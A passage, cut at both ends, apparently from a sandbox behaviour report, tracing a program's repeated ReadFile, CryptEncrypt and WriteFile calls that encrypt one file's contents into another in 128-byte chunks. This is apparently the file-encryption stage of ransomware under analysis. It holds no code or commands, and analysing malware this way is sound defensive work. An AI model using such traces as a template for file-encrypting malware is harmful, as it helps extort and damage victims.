lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.085] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.085] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.085] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.085] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.085] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.085] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.086] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.086] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.086] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.086] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.086] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.086] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.086] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.087] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.087] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.087] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.087] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.087] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.087] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.087] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.087] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.087] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.088] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.088] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.088] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.088] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.088] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.088] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.088] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.089] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.089] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.089] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.089] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.089] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.089] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.089] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.090] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.090] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.090] WriteFile (in: hFile=0xd8, 